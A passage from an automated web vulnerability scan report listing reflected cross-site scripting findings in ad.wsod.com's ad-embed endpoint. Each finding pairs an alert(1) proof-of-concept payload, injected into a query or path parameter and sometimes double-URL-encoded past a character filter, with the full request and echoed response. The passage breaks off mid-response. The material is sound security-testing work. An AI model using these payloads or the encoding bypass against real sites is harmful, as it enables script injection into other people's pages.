/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296399000**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488aa04f"-alert(1)-"69f6ed3ba42&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9">
...[SNIP]...

5.142. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19848"-alert(1)-"51dae16ac72 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G19848"-alert(1)-"51dae16ac72&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296398981**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G19848"-alert(1)-"51dae16ac72&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9">
...[SNIP]...

5.143. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dcce"-alert(1)-"9ebcb941c85 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!5dcce"-alert(1)-"9ebcb941c85&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296398942**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!5dcce"-alert(1)-"9ebcb941c85&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9">
...[SNIP]...

5.144. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad392"-alert(1)-"602f61bfc3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/842662894?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9&ad392"-alert(1)-"602f61bfc3a=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_1=33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L; u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1683

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9&ad392"-alert(1)-"602f61bfc3a=1">
...[SNIP]...

5.145. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48c66"-alert(1)-"510a8f1797d was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=801063948c66"-alert(1)-"510a8f1797d&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
oto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296351609**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=801063948c66"-alert(1)-"510a8f1797d&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a">
...[SNIP]...

5.146. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2c3a"-alert(1)-"4061da44426 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147b2c3a"-alert(1)-"4061da44426&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
5d7fd7c0fb6e6a631357/353.0.js.120x30/1296351649**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147b2c3a"-alert(1)-"4061da44426&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a">
...[SNIP]...

5.147. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40464"-alert(1)-"1a138402111 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a40464"-alert(1)-"1a138402111 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:41:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
*;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a40464"-alert(1)-"1a138402111">
...[SNIP]...

5.148. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9971a"-alert(1)-"2de8531fbc7 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ9971a"-alert(1)-"2de8531fbc7&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:41:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
6e6a631357/353.0.js.120x30/1296351662**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ9971a"-alert(1)-"2de8531fbc7&ASID=b7e3b00f832b4ae1873eac83f051400a">
...[SNIP]...

5.149. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e9b2%2522%253balert%25281%2529%252f%252f370d1d97dd was submitted in the REST URL parameter 2. This input was echoed as 7e9b2";alert(1)//370d1d97dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313577e9b2%2522%253balert%25281%2529%252f%252f370d1d97dd/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:43:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1679

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a6313577e9b2";alert(1)//370d1d97dd/353.0.js.120x30/1296351787**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3
...[SNIP]...

5.150. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d997%2522%253balert%25281%2529%252f%252fcb75c44487c was submitted in the REST URL parameter 3. This input was echoed as 4d997";alert(1)//cb75c44487c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x304d997%2522%253balert%25281%2529%252f%252fcb75c44487c/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:43:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x304d997";alert(1)//cb75c44487c/1296351797**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873e
...[SNIP]...

5.151. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a330d"-alert(1)-"69480e9465 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488a330d"-alert(1)-"69480e9465&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1679

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296351635**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488a330d"-alert(1)-"69480e9465&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a">
...[SNIP]...

5.152. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eec55"-alert(1)-"8b7e3018d80 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/993020147?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=Geec55"-alert(1)-"8b7e3018d80&TargetID=28253488&AN=993020147&PG=INVSRQ&ASID=b7e3b00f832b4ae1873eac83f051400a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2|33:971:560:0:0:37102:1294942822:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
